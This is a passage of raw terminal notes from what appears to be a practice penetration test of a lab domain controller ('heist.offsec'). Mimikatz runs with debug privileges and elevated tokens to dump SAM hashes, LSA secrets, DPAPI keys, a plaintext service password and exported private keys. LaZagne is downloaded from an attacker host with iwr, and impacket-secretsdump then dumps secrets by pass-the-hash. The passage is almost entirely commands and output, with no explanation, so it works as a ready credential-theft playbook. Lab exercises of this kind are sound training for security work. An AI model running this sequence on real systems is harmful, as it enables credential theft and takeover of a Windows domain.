* Thread Token : {0;000003e7} 1 D 80809719 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::sam
Domain : DC01
SysKey : e9a15188a6ad2d20d26fe2bc984b369e
Local SID : S-1-5-21-3175827223-895852877-1244645759
SAMKey : 36d831352373d03423a9b862de0da6e3
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 4942de0385b66f88cf6f9e2fb703ae7b
RID : 000001f5 (501)
User : Guest
RID : 000001f7 (503)
User : DefaultAccount
RID : 000001f8 (504)
User : WDAGUtilityAccount
mimikatz(commandline) # exit
Bye!lsadump::secrets
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 80812073 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 80836806 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::secrets
Domain : DC01
SysKey : e9a15188a6ad2d20d26fe2bc984b369e
Local name : DC01 ( S-1-5-21-3175827223-895852877-1244645759 )
Domain name : HEIST ( S-1-5-21-537427935-490066102-1511301751 )
Domain FQDN : heist.offsec
Policy subsystem is : 1.18
LSA Key(s) : 1, default {97026db5-2ce0-cfa9-294c-19088d8692ec}
[00] {97026db5-2ce0-cfa9-294c-19088d8692ec} 132b5778987e2e72a0f2a7ce9a759b7e2789079d9197ca5bf434bcb2b42c0734
Secret : $MACHINE.ACC
cur/hex : f9 ac 84 54 4b 2f db ed e6 09 18 c3 96 3e 88 04 b2 7f 0d b8 05 2e 14 5d 63 5d 59 de 72 95 d4 ee c2 0b e1 c3 41 9f fe f0 dc 6f ff d5 0a 23 c4 f8 bc 80 e0 d1 03 95 a1 82 ab 6f 9a 40 44 ab 41 df 60 24 21 7b d8 b4 73 11 05 04 55 ec 63 5e 07 b8 20 79 3b d3 00 03 a9 fc 93 3f 24 4a 6e 8d 48 92 eb d3 fa 62 6c 2f 74 4d c4 df 5f 57 fd d1 67 24 5b 5b 66 41 09 d3 43 c2 c0 5e 29 33 85 64 49 e2 0e 2e 6d ea 12 70 e6 6c 2d 21 17 43 f7 a1 f0 6b 12 49 e8 9b 5a cd d2 fe 17 96 29 cb 57 1c ab 44 4e 24 1f 3a a4 95 51 65 27 c6 d5 8d f9 dd 9e d0 d8 ae e1 3e 94 40 3a 7a 93 45 48 7d d9 a6 23 b4 18 00 15 17 b6 5b c9 04 00 72 49 75 ca 2d c8 fa a0 4f a2 85 93 de df ff 0d 6f 1d f6 eb 29 35 ce f6 9e 98 fe 3c c0 78 4e 18 78 cf be 24 aa d0 c9
NTLM:1561bd404f929907a89517d421b5f11b
SHA1:38fa65451f13e088d5d078609994c1fd14a35412
old/hex : b8 f8 1e 5a 9c e3 67 61 83 b1 ba 0e 1f 39 34 bb 84 ec 48 c2 94 57 98 ec 84 b8 b0 93 f8 47 54 b9 ed 99 e6 e0 b5 8d 3e fc 86 06 c9 00 48 db 4b fb 39 4b bd 97 0b 9c d4 26 b5 d4 e9 92 f6 ba be 7d af 6c 39 c7 37 b7 a5 f4 a3 4d fa cf 34 fa c4 c3 ce 69 b2 b0 0c 08 9c c7 52 9a d8 f3 e4 c8 79 06 a0 42 c5 57 02 6b fb 12 74 d8 03 35 1d 84 4f da 88 4b f8 5a 75 e3 1c fd b5 b2 a2 c3 2b 64 d8 64 7f f7 a9 73 44 d0 c7 14 18 64 82 d6 b2 af 8f 9e 0d 1c 80 ea 6a 63 3f cc 2a a2 5c 47 44 5c 40 3c 34 2e 53 4b 80 1f 35 0e 15 2f 1a f7 28 09 c3 43 65 b2 a7 a7 7c 59 ff 1e 97 1e ce 18 9e 8a 32 46 74 54 c3 89 5c a0 25 74 d1 10 6d b3 3a 82 a5 9a 97 6d 00 58 0e 92 b9 d0 25 ee c5 93 05 33 3e c1 30 37 80 61 03 ff 05 15 40 b5 b0 f2 5d ca dc 8b
NTLM:148241f7e74d49393d9eccf5277edbd3
SHA1:70b89c6ed37f0457887464cf40ccf318b8b79629
Secret : DPAPI_SYSTEM
cur/hex : 01 00 00 00 3d f6 57 e4 61 73 98 e4 ab 73 e4 1c 61 83 f8 ac 3d 60 85 23 c6 9b 79 bd ce 1e 77 b2 20 43 bb b5 bd 33 6c 39 d3 96 50 12
full: 3df657e4617398e4ab73e41c6183f8ac3d608523c69b79bdce1e77b22043bbb5bd336c39d3965012
m/u : 3df657e4617398e4ab73e41c6183f8ac3d608523 / c69b79bdce1e77b22043bbb5bd336c39d3965012
old/hex : 01 00 00 00 0e ed 6f c0 84 66 e9 5e 2d 4c c1 1d f7 5a ad bc ec 05 1f 17 7b a2 1a f3 20 6b 25 18 d4 21 23 c8 ef ff 96 9d 3d c5 eb c3
full: 0eed6fc08466e95e2d4cc11df75aadbcec051f177ba21af3206b2518d42123c8efff969d3dc5ebc3
m/u : 0eed6fc08466e95e2d4cc11df75aadbcec051f17 / 7ba21af3206b2518d42123c8efff969d3dc5ebc3
Secret : NL$KM
cur/hex : 4a e2 c6 53 5d 77 02 c9 ae a9 48 23 7c 5b 46 39 4a 56 02 3b cc 38 b8 c0 92 dd 41 2c 72 f2 63 46 71 36 1b e3 d2 ba e7 ac 8c bd e9 d5 55 36 c0 07 99 5a 11 4a 24 e4 42 e3 4c 12 3f f5 1b d7 d5 8c
old/hex : 4a e2 c6 53 5d 77 02 c9 ae a9 48 23 7c 5b 46 39 4a 56 02 3b cc 38 b8 c0 92 dd 41 2c 72 f2 63 46 71 36 1b e3 d2 ba e7 ac 8c bd e9 d5 55 36 c0 07 99 5a 11 4a 24 e4 42 e3 4c 12 3f f5 1b d7 d5 8c
Secret : _SC_FlaskService / service 'FlaskService' with username : HEIST\enox
cur/text: california
Secret : _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7885a5def08901853c5c7bd844057ee9c666cd6e23e9b7a048577ac7248fa744ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
cur/hex : 39 93 45 ad d7 c8 6b 91 f3 d5 45 e3 94 06 ef d4 ed 0e b5 26 5e 6d ae 5f 1a d9 bf b6 f9 9c 8a f8 36 d8 28 23 5a 07 f3 eb d7 a9 53 d5 fe db 6f b3 c6 57 72 f2 55 5f 3e 42 0b c7 d3 0f 89 4a b9 ca f0 67 06 8c 97 63 94 80 43 f8 ad 68 26 ae 46 4c d6 89 69 9e dc 78 a9 8f c2 ef 55 a0 64 fc 1a 02 80 8a 1a 28 9e 6c 40 2b 4a 7c c6 9d 4a d7 e7 1a 04 40 0f 43 7d e8 f3 de 8f 9f 7e da bc d5 5e dd 29 c1 c3 e3 70 72 62 c0 e1 17 c9 35 d2 1c 5a 47 0e e5 52 91 a4 0d a2 a3 33 dd 97 ed af f2 d4 8d 03 62 82 c4 f8 ee 6e d2 7c 69 ae f6 05 7b 1e d0 93 f1 1d 09 04 fe 1f 2d a4 99 fc c3 e9 3c 71 0f 0b 0c fa 26 9b 41 f6 80 91 4f 44 90 5a 07 83 8b 66 51 8e 7b af 93 99 3a 13 78 14 4e a9 18 08 11 87 c8 e9 2f f5 3a 7c db de 92 65 a1 e7 e4 3d 8f
Secret : _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7885a5def08901853c5c7bd844057ee9c666cd6e23e9b7a048577ac7248fa744ERROR kull_m_registry_OpenAndQueryWithAlloc ; kull_m_registry_RegOpenKeyEx KO
cur/hex : 01 00 00 00 22 01 00 00 10 00 00 00 12 01 1a 01 78 72 3b 48 77 d1 3c bc 7b 54 0e ec 50 53 48 3b 2a 4e f3 91 4a eb 7a d5 b5 c5 95 64 6f 8e 9a ea 8b 4e 73 d1 54 0a 6d 61 33 70 7e 23 55 12 1d bd 9a 57 5d 6c 3b 69 a2 37 1e 46 19 a9 c9 13 12 b8 dd da 9e e6 76 3e 12 92 91 67 32 04 c2 b0 c3 91 74 de 78 c0 fe c1 1c a7 98 72 94 ab 5a f9 b6 43 85 c8 ff 2b 94 3a 83 87 99 05 b1 dc 9c 04 62 f8 01 fb f7 7c 99 6b 6c 36 1b 30 7a e9 25 38 45 e1 2f ce 97 ea 98 49 5d cc b9 27 a7 b5 f9 bf 15 01 1b 04 c4 fd dd 3f f3 66 00 6f 17 de 30 68 83 fe d4 0b 7b 2f a9 3a 76 a4 48 8e f8 36 f5 c8 4e 0b 40 77 0c 5e b1 7c 71 df bc 1c 90 81 da dc 8e a3 b6 82 86 c2 f7 19 33 b4 3d a9 bb 8d 50 80 15 a9 8b 61 ba fc 65 f7 7d c6 0b fa b9 12 aa a3 3e 87 f7 74 8b f3 a5 61 bd 68 74 b4 93 6a f2 d3 3d f9 22 68 1e d1 09 20 e2 26 7d 89 be 11 9d 65 16 cc 00 00 9c 0a 85 37 44 17 00 00 9c ac b4 84 43 17 00 00
mimikatz(commandline) # exit
Bye!lsadump::cache
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::cache" "exit" # Cached domain credentials
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 80844371 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 80869112 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # lsadump::cache
Domain : DC01
SysKey : e9a15188a6ad2d20d26fe2bc984b369e
Local name : DC01 ( S-1-5-21-3175827223-895852877-1244645759 )
Domain name : HEIST ( S-1-5-21-537427935-490066102-1511301751 )
Domain FQDN : heist.offsec
Policy subsystem is : 1.18
LSA Key(s) : 1, default {97026db5-2ce0-cfa9-294c-19088d8692ec}
[00] {97026db5-2ce0-cfa9-294c-19088d8692ec} 132b5778987e2e72a0f2a7ce9a759b7e2789079d9197ca5bf434bcb2b42c0734
* Iteration is set to default (10240)
mimikatz(commandline) # exit
Bye!vault::list
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "vault::list" "exit" # Windows Vault list
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 80869962 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 80894767 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # vault::list
Vault : {4bf4c442-9b8a-41a0-b380-dd4a704ddb28}
Name : Web Credentials
Path : C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault\4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Items (0)
Vault : {77bc582b-f0a6-4e15-4e80-61736b6f3b29}
Name : Windows Credentials
Path : C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Vault
Items (0)
mimikatz(commandline) # exit
Bye!vault::cred
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "vault::cred /patch" "exit" # Windows Vault exfil
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 80903955 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 80928791 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # vault::cred /patch
mimikatz(commandline) # exit
Bye!crypto module
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "crypto::stores" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 80942855 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 80967734 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # crypto::stores
Asking for System Store 'CURRENT_USER' (0x00010000)
0. My
1. Root
2. Trust
3. CA
4. UserDS
5. TrustedPublisher
6. Disallowed
7. AuthRoot
8. TrustedPeople
9. ClientAuthIssuer
10. SmartCardRoot
mimikatz(commandline) # exit
Bye!
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "crypto::providers" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 80969233 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 80994114 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # crypto::providers
CryptoAPI providers :
0. RSA_FULL ( 1) - Microsoft Base Cryptographic Provider v1.0
1. DSS_DH (13) - Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
2. DSS ( 3) - Microsoft Base DSS Cryptographic Provider
3. RSA_FULL ( 1) H - Microsoft Base Smart Card Crypto Provider
4. DH_SCHANNEL (18) - Microsoft DH SChannel Cryptographic Provider
5. RSA_FULL ( 1) - Microsoft Enhanced Cryptographic Provider v1.0
6. DSS_DH (13) - Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
7. RSA_AES (24) - Microsoft Enhanced RSA and AES Cryptographic Provider
8. RSA_SCHANNEL (12) - Microsoft RSA SChannel Cryptographic Provider
9. RSA_FULL ( 1) - Microsoft Strong Cryptographic Provider
CryptoAPI provider types:
0. RSA_FULL ( 1) - RSA Full (Signature and Key Exchange)
1. DSS ( 3) - DSS Signature
2. RSA_SCHANNEL (12) - RSA SChannel
3. DSS_DH (13) - DSS Signature with Diffie-Hellman Key Exchange
4. DH_SCHANNEL (18) - Diffie-Hellman SChannel
5. RSA_AES (24) - RSA Full and AES
CNG providers :
0. Microsoft Key Protection Provider
1. Microsoft Passport Key Storage Provider
2. Microsoft Platform Crypto Provider
3. Microsoft Primitive Provider
4. Microsoft Smart Card Key Storage Provider
5. Microsoft Software Key Storage Provider
6. Microsoft SSL Protocol Provider
7. Windows Client Key Protection Provider
mimikatz(commandline) # exit
Bye!
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "crypto::sc" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 80995755 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 81020729 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # crypto::sc
ERROR kuhl_m_crypto_l_sc ; SCardEstablishContext: 0x8010001d
mimikatz(commandline) # exit
Bye!
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "crypto::certificates /export" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 81050156 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 81075033 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # crypto::certificates /export
* System Store : 'CURRENT_USER' (0x00010000)
* Store : 'My'
mimikatz(commandline) # exit
Bye!
PS C:\tmp> .\mimikatz.exe "privilege::debug" "token::elevate" "crypto::keys /export" "exit"
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz(commandline) # privilege::debug
Privilege '20' OK
mimikatz(commandline) # token::elevate
Token Id : 0
User name :
SID name : NT AUTHORITY\SYSTEM
568 {0;000003e7} 1 D 34989 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Primary
-> Impersonated !
* Process Token : {0;000003e7} 0 D 81075753 NT AUTHORITY\SYSTEM S-1-5-18 (04g,28p) Primary
* Thread Token : {0;000003e7} 1 D 81100653 NT AUTHORITY\SYSTEM S-1-5-18 (04g,21p) Impersonation (Delegation)
mimikatz(commandline) # crypto::keys /export
* Store : 'user'
* Provider : 'MS_ENHANCED_PROV' ('Microsoft Enhanced Cryptographic Provider v1.0')
* Provider type : 'PROV_RSA_FULL' (1)
* CNG Provider : 'Microsoft Software Key Storage Provider'
CryptoAPI keys :
CNG keys :
0. e7cdea7a-52c3-c502-fdfe-8c9e141907a0
|Provider name : Microsoft Software Key Storage Provider
|Implementation: NCRYPT_IMPL_SOFTWARE_FLAG ;
Key Container : e7cdea7a-52c3-c502-fdfe-8c9e141907a0
Unique name : 63ffbb8a1852a1651127d0571170f26f_7cdd6232-ce1f-47fd-88fd-58e62ed4572a
Algorithm : RSA
Key size : 2048 (0x00000800)
Export policy : 00000000 ( )
Exportable key : NO
LSA isolation : NO
Private export : OK - 'user_cng_0_e7cdea7a-52c3-c502-fdfe-8c9e141907a0.rsa.pvk'
mimikatz(commandline) # exit
Bye!LaZagne
PS C:\tmp> iwr -Uri http://192.168.45.176/LaZagne.exe -OutFile C:\tmp\LaZagne.exeUploading LaZagne.exe
PS C:\tmp> .\LaZagne.exe all
|====================================================================|
| |
| The LaZagne Project |
| |
| ! BANG BANG ! |
| |
|====================================================================|
[+] 0 passwords have been found.
For more information launch it again with the -v option
elapsed time = 0.8125019073486328impacket-secretsdump
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/heist]
└─$ impacket-secretsdump administrator@dc01.heist.offsec -hashes :b325100ee400c16d56c42f9685381139
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xe9a15188a6ad2d20d26fe2bc984b369e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:4942de0385b66f88cf6f9e2fb703ae7b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
HEIST\DC01$:aes256-cts-hmac-sha1-96:a2000c9407dde22d68141793f38ab597d51ef52f9d75f86b67dd2d40c2fcf822
HEIST\DC01$:aes128-cts-hmac-sha1-96:4f92fc3abc447b0e56f8d140870741f7
HEIST\DC01$:des-cbc-md5:4c9da8647625f8c4
HEIST\DC01$:plain_password_hex:f9ac84544b2fdbede60918c3963e8804b27f0db8052e145d635d59de7295d4eec20be1c3419ffef0dc6fffd50a23c4f8bc80e0d10395a182ab6f9a4044ab41df6024217bd8b47311050455ec635e07b820793bd30003a9fc933f244a6e8d4892ebd3fa626c2f744dc4df5f57fdd167245b5b664109d343c2c05e2933856449e20e2e6dea1270e66c2d211743f7a1f06b1249e89b5acdd2fe179629cb571cab444e241f3aa495516527c6d58df9dd9ed0d8aee13e94403a7a9345487dd9a623b418001517b65bc90400724975ca2dc8faa04fa28593dedfff0d6f1df6eb2935cef69e98fe3cc0784e1878cfbe24aad0c9
HEIST\DC01$:aad3b435b51404eeaad3b435b51404ee:1561bd404f929907a89517d421b5f11b:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x3df657e4617398e4ab73e41c6183f8ac3d608523
dpapi_userkey:0xc69b79bdce1e77b22043bbb5bd336c39d3965012
[*] NL$KM
0000 4A E2 C6 53 5D 77 02 C9 AE A9 48 23 7C 5B 46 39 J..S]w....H#|[F9
0010 4A 56 02 3B CC 38 B8 C0 92 DD 41 2C 72 F2 63 46 JV.;.8....A,r.cF
0020 71 36 1B E3 D2 BA E7 AC 8C BD E9 D5 55 36 C0 07 q6..........U6..
0030 99 5A 11 4A 24 E4 42 E3 4C 12 3F F5 1B D7 D5 8C .Z.J$.B.L.?.....
NL$KM:4ae2c6535d7702c9aea948237c5b46394a56023bcc38b8c092dd412c72f2634671361be3d2bae7ac8cbde9d55536c007995a114a24e442e34c123ff51bd7d58c
[*] _SC_FlaskService
HEIST\enox:california
[*] _SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7885a5def08901853c5c7bd844057ee9c666cd6e23e9b7a048577ac7248fa744
0000 39 93 45 AD D7 C8 6B 91 F3 D5 45 E3 94 06 EF D4 9.E...k...E.....
0010 ED 0E B5 26 5E 6D AE 5F 1A D9 BF B6 F9 9C 8A F8 ...&^m._........
0020 36 D8 28 23 5A 07 F3 EB D7 A9 53 D5 FE DB 6F B3 6.(#Z.....S...o.
0030 C6 57 72 F2 55 5F 3E 42 0B C7 D3 0F 89 4A B9 CA .Wr.U_>B.....J..
0040 F0 67 06 8C 97 63 94 80 43 F8 AD 68 26 AE 46 4C .g...c..C..h&.FL
0050 D6 89 69 9E DC 78 A9 8F C2 EF 55 A0 64 FC 1A 02 ..i..x....U.d...
0060 80 8A 1A 28 9E 6C 40 2B 4A 7C C6 9D 4A D7 E7 1A ...(.l@+J|..J...
0070 04 40 0F 43 7D E8 F3 DE 8F 9F 7E DA BC D5 5E DD .@.C}.....~...^.
0080 29 C1 C3 E3 70 72 62 C0 E1 17 C9 35 D2 1C 5A 47 )...prb....5..ZG
0090 0E E5 52 91 A4 0D A2 A3 33 DD 97 ED AF F2 D4 8D ..R.....3.......
00a0 03 62 82 C4 F8 EE 6E D2 7C 69 AE F6 05 7B 1E D0 .b....n.|i...{..
00b0 93 F1 1D 09 04 FE 1F 2D A4 99 FC C3 E9 3C 71 0F .......-.....<q.
00c0 0B 0C FA 26 9B 41 F6 80 91 4F 44 90 5A 07 83 8B ...&.A...OD.Z...
00d0 66 51 8E 7B AF 93 99 3A 13 78 14 4E A9 18 08 11 fQ.{...:.x.N....
00e0 87 C8 E9 2F F5 3A 7C DB DE 92 65 A1 E7 E4 3D 8F .../.:|...e...=.
_SC_GMSA_DPAPI_{C6810348-4834-4a1e-817D-5838604E6004}_7885a5def08901853c5c7bd844057ee9c666cd6e23e9b7a048577ac7248fa744:399345add7c86b91f3d545e39406efd4ed0eb5265e6dae5f1ad9bfb6f99c8af836d828235a07f3ebd7a953d5fedb6fb3c65772f2555f3e420bc7d30f894ab9caf067068c9763948043f8ad6826ae464cd689699edc78a98fc2ef55a064fc1a02808a1a289e6c402b4a7cc69d4ad7e71a04400f437de8f3de8f9f7edabcd55edd29c1c3e3707262c0e117c935d21c5a470ee55291a40da2a333dd97edaff2d48d036282c4f8ee6ed27c69aef6057b1ed093f11d0904fe1f2da499fcc3e93c710f0b0cfa269b41f680914f44905a07838b66518e7baf93993a1378144ea918081187c8e92ff53a7cdbde9265a1e7e43d8f
[*] _SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_7885a5def08901853c5c7bd844057ee9c666cd6e23e9b7a048577ac7248fa744
0000 01 00 00 00 22 01 00 00 10 00 00 00 12 01 1A 01 ...."...........
0010 78 72 3B 48 77 D1 3C BC 7B 54 0E EC 50 53 48 3B xr;Hw.<.{T..PSH;
0020 2A 4E F3 91 4A EB 7A D5 B5 C5 95 64 6F 8E 9A EA *N..J.z....do...
0030 8B 4E 73 D1 54 0A 6D 61 33 70 7E 23 55 12 1D BD .Ns.T.ma3p~#U...
0040 9A 57 5D 6C 3B 69 A2 37 1E 46 19 A9 C9 13 12 B8 .W]l;i.7.F......
0050 DD DA 9E E6 76 3E 12 92 91 67 32 04 C2 B0 C3 91 ....v>...g2.....
0060 74 DE 78 C0 FE C1 1C A7 98 72 94 AB 5A F9 B6 43 t.x......r..Z..C
0070 85 C8 FF 2B 94 3A 83 87 99 05 B1 DC 9C 04 62 F8 ...+.:........b.
0080 01 FB F7 7C 99 6B 6C 36 1B 30 7A E9 25 38 45 E1 ...|.kl6.0z.%8E.
0090 2F CE 97 EA 98 49 5D CC B9 27 A7 B5 F9 BF 15 01 /....I]..'......
00a0 1B 04 C4 FD DD 3F F3 66 00 6F 17 DE 30 68 83 FE .....?.f.o..0h..
00b0 D4 0B 7B 2F A9 3A 76 A4 48 8E F8 36 F5 C8 4E 0B ..{/.:v.H..6..N.
00c0 40 77 0C 5E B1 7C 71 DF BC 1C 90 81 DA DC 8E A3 @w.^.|q.........
00d0 B6 82 86 C2 F7 19 33 B4 3D A9 BB 8D 50 80 15 A9 ......3.=...P...
00e0 8B 61 BA FC 65 F7 7D C6 0B FA B9 12 AA A3 3E 87 .a..e.}.......>.
00f0 F7 74 8B F3 A5 61 BD 68 74 B4 93 6A F2 D3 3D F9 .t...a.ht..j..=.
